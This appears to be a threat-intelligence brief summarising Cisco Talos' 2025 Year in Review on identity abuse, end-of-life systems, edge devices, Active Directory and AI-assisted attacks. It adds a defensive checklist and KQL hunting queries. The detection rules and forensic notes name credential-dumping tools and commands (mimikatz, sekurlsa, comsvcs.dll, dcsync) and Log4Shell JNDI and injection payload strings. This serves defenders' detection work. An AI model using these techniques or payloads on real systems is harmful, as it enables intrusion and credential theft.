← Back to Cybersecurity News Center
Severity
HIGH
CVSS
7.5
Priority
0.856
×
Tip
Pick your view
Analyst for full detail, Executive for the short version.
Analyst
Executive
Executive Summary
Cisco Talos' 2025 Year in Review identifies five structural weaknesses that attackers exploited systematically across the full year: identity and authentication abuse, unpatched and end-of-life systems, network edge device compromise, Active Directory exploitation, and AI-assisted attack scaling. Device compromise rose 178% year over year, and nearly 40% of the most targeted vulnerabilities affected products that vendors no longer support. The report signals that attacker advantages are increasingly structural, not situational, meaning organizations that have deferred identity hygiene, patch cycles, and edge device hardening are now carrying compounding risk across all five vectors simultaneously.
Impact Assessment
CISA KEV Status
Not listed
Threat Severity
HIGH
High severity — prioritize for investigation
Actor Attribution
HIGH
Multiple ransomware operators (unspecified), China-nexus state-sponsored actors
TTP Sophistication
HIGH
17 MITRE ATT&CK techniques identified
Detection Difficulty
HIGH
Multiple evasion techniques observed
Target Scope
INFO
IAM platforms, PAM systems, VPNs, Active Directory Domain Controllers, application delivery controllers (ADCs), firewalls, PHP frameworks, Apache Log4j (Log4Shell), Adobe ColdFusion, network management platforms, with elevated exposure on end-of-life systems
Are You Exposed?
⚠
Your industry is targeted by Multiple ransomware operators (unspecified), China-nexus state-sponsored actors → Heightened risk
⚠
You use products/services from IAM platforms → Assess exposure
⚠
17 attack techniques identified — review your detection coverage for these TTPs
✓
Your EDR/XDR detects the listed IOCs and TTPs → Reduced risk
✓
You have incident response procedures for this threat type → Prepared
Business Context
The Talos findings establish that the five exploited weaknesses are not isolated technical failures — they are compounding governance gaps that increase breach probability and cost with each deferral cycle. Organizations carrying EOL infrastructure, weak identity controls, or unmonitored network edge devices are exposed across multiple attacker playbooks simultaneously, including ransomware operators and all four major state-sponsored threat clusters. The 178% year-over-year increase in device compromise translates directly to higher incident response costs, extended recovery timelines, and increased regulatory scrutiny for organizations in sectors with mandatory breach notification obligations.
You Are Affected If
Your organization operates IAM or PAM platforms without MFA push-bombing protections or session token lifetime controls
Your environment includes end-of-life systems — particularly those running Log4j-dependent applications, Adobe ColdFusion, or legacy PHP frameworks — with internet or network exposure
Your network perimeter includes VPNs, application delivery controllers, or firewalls that lack EDR coverage and are not baselined for behavioral anomaly detection
Your Active Directory environment has not undergone attack path analysis in the past 12 months, or carries legacy trusts and over-provisioned accounts from prior consolidations
Your organization operates in a sector previously targeted by China-nexus, Russia-nexus, North Korea-nexus, or Iran-nexus actors, or has been targeted by ransomware operators in the past three years
Board Talking Points
Attackers in 2025 systematically exploited five structural weaknesses — identity controls, unpatched systems, network edge devices, Active Directory, and AI-assisted automation — and device compromise increased 178% year over year, meaning organizations that have deferred hardening in any of these areas carry documented, compounding risk today.
The organization should prioritize a 30-day audit of end-of-life systems, MFA control quality, and Active Directory posture, with findings and remediation timelines presented to the security committee before the next board cycle.
Organizations that do not address these structural gaps face higher breach probability, longer recovery timelines, and increased exposure to regulatory penalties — the Talos data shows these are not theoretical risks but active attacker priorities observed at scale across 2025.
Technical Analysis
Talos' annual synthesis draws from incident response engagements, telemetry, and threat intelligence collected across 2025, and the picture it assembles is one of converging structural failures rather than isolated exploitation events.
The first and most pervasive weakness is identity and authentication abuse.
Attackers targeting IAM and PAM platforms used credential stuffing, MFA bypass techniques (T1621 , MFA fatigue and push-bombing), and session token theft (T1539 ) to circumvent authentication without ever touching a vulnerability.
Valid account abuse (T1078 ) and authentication mechanism modification (T1556 , T1556.006 ) appeared consistently across ransomware and state-sponsored intrusions alike, reinforcing that authentication controls, not just perimeter defenses, are the primary battleground.
The second weakness is the unpatched and end-of-life system problem, which Talos frames as an industry-wide governance failure rather than a technical oversight. Nearly 40% of the top 100 most targeted vulnerabilities affected EOL products. Log4Shell (CVE-2021-44228 ) and Adobe ColdFusion vulnerabilities, some more than a decade old, remained active exploitation targets throughout 2025. Exploitation of public-facing applications (T1190 ) mapped consistently to CWE-1104 (use of unmaintained third-party components) and CWE-1395 (use of weak or broken cryptographic primitives), indicating that the exposure is not merely about missing patches but about inherited technical debt that defenders cannot patch their way out of.
The third weakness is trust-broker compromise. VPNs, application delivery controllers, and firewalls, devices that sit at the intersection of trusted and untrusted networks, were systematically targeted for persistent access. External remote services (T1133 ) provided initial footholds; exploitation of privilege escalation weaknesses (T1068 ) extended attacker reach once inside. Because these devices often lack EDR coverage and generate logs that security teams underinspect, dwell times in this vector tend to be extended.
The fourth weakness is Active Directory abuse. Once inside, attackers consistently turned to AD as the path of least resistance for lateral movement and privilege escalation. Domain policy modification (T1484 ), credential dumping (T1003 ), and remote service exploitation (T1021 ) formed a recurring post-exploitation chain. The persistence of this pattern reflects a broader problem: AD environments accumulate misconfigurations, legacy trusts, and over-provisioned accounts over years, and few organizations have continuous AD posture monitoring in place.
The fifth weakness is AI-assisted attack scaling. Talos documents attacker use of AI to accelerate reconnaissance (T1595 , T1589 ), generate targeted phishing content (T1566 ), and automate exploitation chain assembly. The practical effect is compression of the time between initial access and lateral movement, reducing the window defenders have to detect and respond. This is not a speculative future threat; Talos observed it operationally across 2025 engagements.
Across all five vectors, Talos notes that behavioral anomalies remain detectable by well-tuned defenses. The core defensive gap is not sensor coverage, it is the absence of tuned behavioral baselines, which means attacker activity blends into noise rather than generating actionable alerts.
Action Checklist IR ENRICHED
Triage Priority:
URGENT
Escalate immediately to CISO and legal counsel if any Talos-published IOC matches observed network traffic or log entries, if an EOL network edge device (VPN, ADC, firewall) shows evidence of unauthorized access, or if Active Directory replication metadata indicates DCSync activity (T1003.006) — any of these conditions indicate a likely active compromise requiring breach notification assessment under applicable regulatory frameworks (HIPAA, PCI-DSS, state breach notification laws).
1
Step 1: Assess exposure, audit your environment for end-of-life systems across all five affected categories: IAM/PAM platforms, VPNs, ADCs, firewalls, and application frameworks including PHP, Log4j-dependent services, and ColdFusion instances. Prioritize internet-facing and network-edge assets.
IR Detail
Preparation
NIST 800-61r3 §2 — Preparation: establishing IR capability and reducing attack surface before incidents occur
NIST SI-2 (Flaw Remediation) — identify and correct EOL systems that cannot receive patches
NIST RA-3 (Risk Assessment) — assess risk of running unsupported IAM/PAM, VPN, ADC, and firewall platforms
CIS 1.1 (Establish and Maintain Detailed Enterprise Asset Inventory) — enumerate all assets including network-edge devices and application frameworks
CIS 2.2 (Ensure Authorized Software is Currently Supported) — flag Log4j-dependent services, Adobe ColdFusion, and PHP frameworks running unsupported versions
CIS 7.1 (Establish and Maintain a Vulnerability Management Process) — scope vulnerability scanning to include EOL network edge devices that scanners often skip
Compensating Control
Run `nmap -sV --script=banner -p 443,8443,80,8080,22,23 <CIDR>` against your perimeter to fingerprint VPN gateways, ADCs, and firewalls and identify product versions. Cross-reference output against CISA's Known Exploited Vulnerabilities (KEV) catalog using a local copy and `grep`. For Log4j exposure, use the free Huntress Log4Shell Vulnerability Tester or run `find / -name 'log4j*.jar' -o -name 'log4j*.war'` on Linux hosts; on Windows use `Get-ChildItem -Recurse -Filter 'log4j*.jar'`. For ColdFusion, query HTTP response headers for `X-Powered-By: ColdFusion` or check `C:\ColdFusion<version>\cfusion\logs\` for version strings.
Preserve Evidence
Before modifying any system, capture: (1) current firewall and VPN firmware version strings from admin console or SNMP OID 1.3.6.1.2.1.1.1.0 (sysDescr); (2) ColdFusion administrator logs at `{cf_root}/cfusion/logs/application.log` and `server.log` for evidence of pre-existing exploitation; (3) Log4j JNDI lookup attempts in Java application logs — search for `${jndi:` string patterns in any `.log` file; (4) PAM platform audit logs showing recent privileged session creation, particularly any sessions initiated from external IP ranges; (5) network flow data (NetFlow/IPFIX) from edge devices showing unusual outbound connections on TCP 1389, 389, or 636 (LDAP/LDAPS) which indicate active Log4Shell exploitation.
2
Step 2: Review controls, verify MFA implementation quality (not just MFA presence): confirm push-bombing protections are active, session token lifetimes are enforced, and PAM solutions log and alert on privileged session anomalies. Confirm EDR coverage extends to network edge devices or compensating log monitoring is in place.
IR Detail
Preparation
NIST 800-61r3 §2 — Preparation: ensuring detective and preventive controls are functional before adversary activity occurs; aligns with CSF PR and DE functions
NIST IR-4 (Incident Handling) — validate that PAM alerting on privileged session anomalies feeds the incident handling capability
NIST SI-4 (System Monitoring) — confirm monitoring coverage extends to VPN concentrators, ADCs, and firewalls where EDR agents cannot be deployed
NIST IA-5 (Authenticator Management) — enforce session token lifetimes and MFA push-bombing protections on IAM/PAM platforms targeted in the Talos findings
CIS 6.3 (Require MFA for Externally-Exposed Applications) — validate push-fatigue protections (number matching, geographic context) are enabled, not just MFA enrollment
CIS 6.5 (Require MFA for Administrative Access) — confirm PAM-gated administrative sessions require MFA at privilege elevation, not only at initial login
CIS 8.2 (Collect Audit Logs) — verify syslog forwarding is active from VPN gateways, firewalls, and ADCs to a central log store
Compensating Control
For MFA push-bombing detection without enterprise IAM tooling: enable number-matching in Microsoft Authenticator (Entra ID free tier) or use TOTP-based MFA (Google Authenticator, FreeOTP) which is immune to push-bombing by design. For PAM session monitoring on a budget, deploy Sysmon (config minimum: EventID 1 process create, EventID 3 network connect, EventID 10 process access) on PAM jump hosts and forward via WEF (Windows Event Forwarding) to a central Windows Event Collector. For network edge devices without EDR, configure syslog-ng or rsyslog to receive device logs and write a simple `grep`/`awk` cron job alerting on authentication failure bursts: `awk '/Failed|authentication failure/{count[$4]++} END{for(ip in count) if(count[ip]>10) print ip, count[ip]}' /var/log/syslog`.
Preserve Evidence
Before tuning controls, baseline and preserve: (1) Azure AD / Entra ID sign-in logs (MFA result field, conditional access outcome, IP address) — export via `Get-MgAuditLogSignIn` for the prior 30 days to establish normal MFA approval rates and detect historical push-bombing attempts; (2) PAM platform session recordings index — note any sessions with anomalous duration, unusual target systems, or off-hours timing consistent with T1078 (Valid Accounts) abuse; (3) VPN authentication logs showing successful logins from IP ranges not matching established user baselines — on Cisco ASA review `%ASA-6-113015` and `%ASA-6-113019` syslog messages; (4) Active Directory Security Event Log (Event ID 4768 — Kerberos TGT request, Event ID 4769 — service ticket request) on Domain Controllers to identify credential abuse predating the control review.
3
Step 3: Update threat model, incorporate all five Talos-identified vectors as active threat scenarios in your threat register. Map them to your current control inventory against MITRE ATT&CK techniques T1078, T1621, T1539, T1190, T1484, T1003, T1133, and T1595. Flag gaps where no detective control exists.
IR Detail
Preparation
NIST 800-61r3 §2 — Preparation: using threat intelligence to shape IR plans and detection priorities; aligns with CSF ID.RA (Risk Assessment) and DE.AE-07 (CTI integration into adverse event analysis)
NIST RA-3 (Risk Assessment) — update risk register entries for identity abuse (T1078, T1621), network edge exploitation (T1190, T1133), and AD attacks (T1484, T1003) based on Talos prevalence data
NIST IR-8 (Incident Response Plan) — revise IR plan scenarios to include the five Talos structural weaknesses as named threat scenarios with specific playbook triggers
NIST SI-5 (Security Alerts, Advisories, and Directives) — formally process the Talos 2025 Year in Review as a threat intelligence input requiring control gap analysis
CIS 7.1 (Establish and Maintain a Vulnerability Management Process) — incorporate T1190 (Exploit Public-Facing Application) targeting EOL ADCs, firewalls, and ColdFusion into vuln prioritization criteria
CIS 7.2 (Establish and Maintain a Remediation Process) — assign remediation priority to control gaps identified in the ATT&CK mapping, particularly where no detective control exists for T1484 (Domain Policy Modification) or T1003 (OS Credential Dumping)
Compensating Control
Use the free MITRE ATT&CK Navigator (browser-based, no installation) to create a layer mapping your existing detective controls against T1078, T1621, T1539, T1190, T1484, T1003, T1133, and T1595 — color-code red for no coverage, yellow for partial, green for covered. Export the layer as JSON for your threat register. For Sigma rule coverage gaps, search the public Sigma rule repository (`github.com/SigmaHQ/sigma`) for rules targeting each technique — e.g., `rules/windows/builtin/security/win_security_dcsync.yml` covers T1003.006 (DCSync), and `rules/network/cisco/` covers edge device anomalies.
Preserve Evidence
Before updating the threat model, pull current-state evidence to establish a baseline: (1) Windows Security Event Log — query for Event ID 4742 (computer account changed) and Event ID 4662 (directory service object access with replication rights) on DCs to determine if T1003.006 (DCSync) has been attempted; (2) Group Policy change audit logs — Event ID 5136 (directory service object modified) filtered on `groupPolicyContainer` objects to detect T1484 (Domain Policy Modification) in the prior 90 days; (3) Windows Security Event Log Event ID 4964 (special groups logon) and Event ID 4672 (special privileges assigned) to surface T1078 (Valid Account) privilege escalation; (4) VPN and firewall logs for T1133 (External Remote Services) — extract all successful authentications from IP reputation feeds and flag any from Tor exit nodes, bulletproof hosting ASNs, or anonymizers.
4
Step 4: Communicate findings, brief leadership on the 178% device compromise increase and the EOL system finding. Frame the EOL issue as governance risk, not technical debt: if 40% of targeted vulnerabilities affect unsupported products, any EOL system your organization runs is a documented attacker priority.
IR Detail
Post-Incident
NIST 800-61r3 §4 — Post-Incident Activity: lessons learned, communicating systemic risk to leadership to drive policy and resource decisions; aligns with CSF GV.OC (Organizational Context)
NIST IR-6 (Incident Reporting) — extend reporting obligations to proactive risk communication: leadership must be informed of material threat intelligence findings like the Talos 178% device compromise increase before an incident occurs
NIST IR-8 (Incident Response Plan) — EOL system risk must be documented in the IR plan as a known environmental constraint affecting containment and eradication options
NIST SI-2 (Flaw Remediation) — the 40% EOL vulnerability targeting statistic is a direct input to the flaw remediation program; unsupported systems are unfixable by definition and require compensating control or decommission decisions
CIS 7.2 (Establish and Maintain a Remediation Process) — EOL systems with no patch path must be escalated to leadership as requiring either compensating controls or formal decommission timelines per the remediation process
Compensating Control
For teams without a formal risk register tool: create a one-page EOL Risk Register in a spreadsheet listing each EOL asset, its internet-facing status, the CVEs actively targeting its product family (pulled from CISA KEV), and the business owner. Attach the Talos statistic (40% of targeted vulns affect EOL products) as a cited source. Present as a risk acceptance decision requiring leadership signature — this documents due diligence and creates accountability for the decommission/compensate decision. Use CISA's free Cyber Hygiene (CyHy) scanning service for external attack surface validation to support the briefing with objective data.
Preserve Evidence
Supporting data for the leadership brief that must be preserved as documented evidence: (1) CISA KEV catalog entries — download the current KEV JSON feed (`https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json`) and filter for CVEs affecting your specific EOL products to produce a count of actively exploited vulnerabilities you cannot patch; (2) Asset inventory export showing EOL systems with their last-seen network activity timestamps — confirming they are active, not dormant; (3) Vulnerability scanner output (even from free tools like OpenVAS or Greenbone Community Edition) showing CVSS scores against EOL assets — this quantifies the risk in terms leadership can act on; (4) Network flow records showing inbound connection attempts to EOL network edge devices from external IP ranges — demonstrating active adversary interest, not hypothetical risk.
5
Step 5: Monitor developments, subscribe to Cisco Talos threat intelligence feeds for follow-on disclosures and sector-specific findings related to the threat vectors described in this report.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2 — Detection and Analysis: integrating external threat intelligence into ongoing monitoring; aligns with DE.AE-07 (CTI integrated into adverse event analysis) and DE.CM-01 (network monitoring for adverse events)
NIST SI-5 (Security Alerts, Advisories, and Directives) — formally subscribe to Cisco Talos intelligence feeds as an external organization providing security alerts and advisories
NIST IR-5 (Incident Monitoring) — incorporate Talos-published IOCs (IP ranges, domains, file hashes associated with identity abuse and edge device compromise campaigns) into active monitoring queries
NIST AU-6 (Audit Record Review, Analysis, and Reporting) — update log review procedures to query for Talos-disclosed IOCs across VPN, firewall, AD, and IAM log sources as new indicators are published
CIS 8.2 (Collect Audit Logs) — ensure log collection scope covers the sources where Talos-identified campaign activity would appear: DC Security logs, VPN auth logs, ADC access logs, and IAM platform audit trails
Compensating Control
Subscribe to Cisco Talos free intelligence feeds: the Talos IP Blacklist (`https://talosintelligence.com/documents/ip-blacklist`) updates daily and can be ingested into pfSense, iptables, or Windows Firewall via scheduled script. Use `curl` + `cron` to pull the feed daily and pipe into a local blocklist. For IOC matching without a SIEM, deploy osquery with the `osquery-defense-kit` pack and write a simple query against `process_open_sockets` to flag connections to Talos-listed IPs. For file-based IOCs (hashes), update ClamAV signatures with community databases including the `MalwarePatrol` feed (free tier available) and run scheduled scans on web-facing servers hosting PHP, ColdFusion, or Log4j-dependent applications. Create a free account on VirusTotal to bulk-check any new hashes Talos publishes.
Preserve Evidence
Evidence to collect and preserve as Talos publishes follow-on IOCs: (1) DNS query logs from your resolver (bind query log or Windows DNS debug logging — enable via `dnscmd /config /logLevel 0x8100`) to retroactively hunt Talos-disclosed C2 domains against historical queries, identifying beaconing that predates your subscription to the feed; (2) Proxy/firewall logs for HTTP/S connections matching Talos-published URI patterns associated with identity abuse campaigns — specifically look for POST requests to `/api/` endpoints on IAM/PAM platforms from unusual source IPs; (3) NetFlow or firewall session logs for connections to Talos-disclosed C2 IP ranges, preserved for at least 90 days to support retroactive hunt when new IOCs are released; (4) Windows Security Event Log Event ID 4624 (successful logon) Type 3 (network) and Type 10 (remote interactive) from Domain Controllers — retain for 180 days to support retroactive correlation when Talos publishes actor-attributed IP indicators from the 2025 campaigns.
Recovery Guidance
Following containment of any compromise linked to the Talos-identified vectors, prioritize rebuilding affected identity infrastructure (PAM, IAM, AD) from known-good baselines rather than attempting in-place remediation — session tokens, Kerberos tickets (including Golden/Silver Ticket artifacts), and OAuth tokens issued during the compromise window must be invalidated wholesale via a krbtgt double-reset for AD environments and full OAuth token revocation for IAM platforms. Monitor rebuilt systems for at least 30 days post-recovery using enhanced logging at the DEBUG level on PAM platforms, and watch specifically for T1078 (Valid Account) re-use, T1484 (Domain Policy Modification) attempts, and any reconnection to Talos-disclosed C2 infrastructure. EOL systems that cannot be patched must remain isolated from production network segments post-recovery until a formal decommission or compensating control decision is documented and approved.
Key Forensic Artifacts
Active Directory replication metadata — run `repadmin /showrepl` and audit Event ID 4662 (object access with DS-Replication-Get-Changes-All permission) on Domain Controllers to detect DCSync (T1003.006) credential theft that Talos identified as a top AD exploitation technique
PAM platform privileged session logs — export full session recordings and command audit trails for all sessions initiated in the 90 days prior to detection, focusing on sessions accessing Domain Controllers, firewall management interfaces, and VPN admin consoles — these are the lateral movement paths Talos documented in AD exploitation chains
Web server access logs on ColdFusion and PHP application servers — search for URI patterns consistent with deserialization exploitation (`/CFIDE/administrator/`, `/flex2gateway/`, `%{${`) and Log4Shell JNDI payloads (`${jndi:ldap://`, `${jndi:rmi://`) with source IPs and response codes preserved for timeline reconstruction
Network edge device (VPN/ADC/firewall) configuration change logs — extract all configuration changes (Cisco ASA: `show archive log config all`, Palo Alto: configuration audit log) for the prior 90 days to identify backdoor accounts, policy weakening, or rogue admin sessions consistent with the 178% device compromise increase Talos reported
Windows Security Event Log Event ID 4776 (NTLM credential validation) and Event ID 4771 (Kerberos pre-auth failure) on Domain Controllers — high volumes of these events from a single source IP or against multiple accounts indicate credential stuffing or password spray attacks against AD, the identity abuse vector Talos ranked as the top structural weakness of 2025
Detection Guidance
Talos' findings map to several high-value detection opportunities across the five vectors.
For identity and authentication abuse: monitor authentication logs for MFA push fatigue patterns (multiple push requests in short succession from a single account), impossible travel events, and session token reuse from new or anomalous IP ranges.
Alert on PAM session initiations outside business hours or from unexpected source addresses.
Review for T1556 and T1556.006 indicators, specifically, modifications to authentication provider configurations or conditional access policies.
For EOL system exploitation: query your asset inventory against published EOL dates for all network-facing systems. Cross-reference with vulnerability scan results for CVEs affecting Log4j (CVE-2021-44228 and related), Adobe ColdFusion, and PHP frameworks. Prioritize assets with no available vendor patch path, these require compensating controls or isolation.
For trust-broker compromise: establish baseline traffic profiles for all VPNs, ADCs, and firewalls. Alert on configuration changes, unexpected authentication attempts, and outbound connections to non-standard destinations from these devices. Review for T1133 patterns, authentication to external remote services from internal service accounts.
For Active Directory abuse: enable and baseline AD audit logging, focusing on Group Policy Object modifications (T1484 ), Kerberoastable account queries, NTDS.dit access attempts (T1003 ), and new trust relationship creation. Tools like BloodHound CE should be run on a recurring schedule (monthly or quarterly) and results baselined for AD attack path change detection.
For AI-assisted reconnaissance: monitor for high-volume, structured reconnaissance patterns (T1595 ) that suggest automation, port scanning cadence, subdomain enumeration bursts, or LinkedIn scraping activity. These precede the phishing (T1566 ) and exploitation phases and represent an early-warning opportunity that is often ignored.
Log sources to prioritize: identity provider authentication logs, PAM session logs, VPN/firewall authentication and configuration change logs, Windows Security Event Log (event IDs 4624, 4625, 4648, 4672, 4768, 4769, 4776), and Active Directory replication logs.
Indicators of Compromise (1)
Export as
Splunk SPL
KQL
Elastic
Copy All (1)
1 tool
Type Value Enrichment Context Conf.
⚙ TOOL
Pending — refer to Cisco Talos 2025 Year in Review report for published indicators
C2 infrastructure details, payload hashes, and campaign-specific IOCs are documented in the full Talos 2025 Year in Review report. The source article URL provided does not surface specific indicator values; retrieve directly from the Talos report PDF at the source URL listed.
LOW
Platform Playbooks
Microsoft Sentinel / Defender
CrowdStrike Falcon
AWS Security
🔒
Microsoft 365 E3
3 log sources
Basic identity + audit. No endpoint advanced hunting. Defender for Endpoint requires separate P1/P2 license.
🛡
Microsoft 365 E5
18 log sources
Full Defender suite: Endpoint P2, Identity, Office 365 P2, Cloud App Security. Advanced hunting across all workloads.
🔍
E5 + Sentinel
27 log sources
All E5 tables + SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence). Analytics rules, playbooks, workbooks.
IOC Detection Queries (1)
Known attack tool — NOT a legitimate system binary. Any execution is suspicious.
KQL Query Preview
Read-only — detection query only
// Threat: Talos 2025 Year in Review: Five Structural Weaknesses Attackers Exploited Most,
// Attack tool: Pending — refer to Cisco Talos 2025 Year in Review report for published indicators
// Context: C2 infrastructure details, payload hashes, and campaign-specific IOCs are documented in the full Talos 2025 Year in Review report. The source article URL provided does not surface specific indicator v
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName =~ "Pending — refer to Cisco Talos 2025 Year in Review report for published indicators"
or ProcessCommandLine has "Pending — refer to Cisco Talos 2025 Year in Review report for published indicators"
or InitiatingProcessCommandLine has "Pending — refer to Cisco Talos 2025 Year in Review report for published indicators"
| project Timestamp, DeviceName, FileName, FolderPath,
ProcessCommandLine, AccountName, AccountDomain,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (6)
Sentinel rule: Web application exploit patterns
KQL Query Preview
Read-only — detection query only
CommonSecurityLog
| where TimeGenerated > ago(7d)
| where DeviceVendor has_any ("PaloAlto", "Fortinet", "F5", "Citrix")
| where Activity has_any ("attack", "exploit", "injection", "traversal", "overflow")
or RequestURL has_any ("../", "..\\\\", "<script", "UNION SELECT", "\${jndi:")
| project TimeGenerated, DeviceVendor, SourceIP, DestinationIP, RequestURL, Activity, LogSeverity
| sort by TimeGenerated desc
Sentinel rule: Privilege escalation / account modification
KQL Query Preview
Read-only — detection query only
AuditLogs
| where TimeGenerated > ago(7d)
| where OperationName has_any ("Add member to role", "Add app role assignment", "Add owner to application", "Reset user password")
| extend Target = tostring(TargetResources[0].userPrincipalName), Actor = tostring(InitiatedBy.user.userPrincipalName)
| project TimeGenerated, OperationName, Actor, Target, Result
| sort by TimeGenerated desc
Sentinel rule: Lateral movement via RDP / SMB / WinRM
KQL Query Preview
Read-only — detection query only
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort in (3389, 5985, 5986, 445, 135)
| where LocalIP != RemoteIP
| summarize ConnectionCount = count(), TargetDevices = dcount(RemoteIP) by DeviceName, InitiatingProcessFileName
| where ConnectionCount > 10 or TargetDevices > 3
| sort by TargetDevices desc
Sentinel rule: Credential dumping / LSASS access
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("procdump.exe", "mimikatz.exe", "sekurlsa.exe")
or ProcessCommandLine has_any ("lsass", "sekurlsa", "logonpasswords", "sam hive", "ntds.dit", "dcsync")
or (FileName =~ "rundll32.exe" and ProcessCommandLine has "comsvcs.dll")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Phishing email delivery
KQL Query Preview
Read-only — detection query only
EmailEvents
| where Timestamp > ago(7d)
| where ThreatTypes has "Phish" or DetectionMethods has "Phish"
| summarize Attachments = make_set(AttachmentCount), Urls = make_set(UrlCount) by NetworkMessageId, Timestamp, SenderFromAddress, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, ThreatTypes
| sort by Timestamp desc
Sentinel rule: Sign-ins from unusual locations
KQL Query Preview
Read-only — detection query only
SigninLogs
| where TimeGenerated > ago(7d)
| where ResultType == 0
| summarize Locations = make_set(Location), LoginCount = count(), DistinctIPs = dcount(IPAddress) by UserPrincipalName
| where array_length(Locations) > 3 or DistinctIPs > 5
| sort by DistinctIPs desc
No actionable IOCs for CrowdStrike import (benign/contextual indicators excluded).
No hard IOCs available for AWS detection queries (contextual/benign indicators excluded).
Compliance Framework Mappings
T1484
T1621
T1190
T1098.005
T1539
T1021
+11
CA-8
RA-5
SC-7
SI-2
SI-7
AC-17
+17
16.4
6.3
6.4
6.5
7.3
7.4
+4
164.312(d)
164.308(a)(5)(i)
A.8.8
A.5.34
A.5.21
A.8.24
MITRE ATT&CK Mapping
T1484
Domain or Tenant Policy Modification
defense-evasion
T1621
Multi-Factor Authentication Request Generation
credential-access
T1190
Exploit Public-Facing Application
initial-access
T1539
Steal Web Session Cookie
credential-access
T1021
Remote Services
lateral-movement
T1003
OS Credential Dumping
credential-access
T1589
Gather Victim Identity Information
reconnaissance
T1566
Phishing
initial-access
T1550.001
Application Access Token
defense-evasion
T1133
External Remote Services
persistence
T1078
Valid Accounts
defense-evasion
T1556
Modify Authentication Process
credential-access
T1595
Active Scanning
reconnaissance
T1556.006
Multi-Factor Authentication
credential-access
T1068
Exploitation for Privilege Escalation
privilege-escalation
Guidance Disclaimer
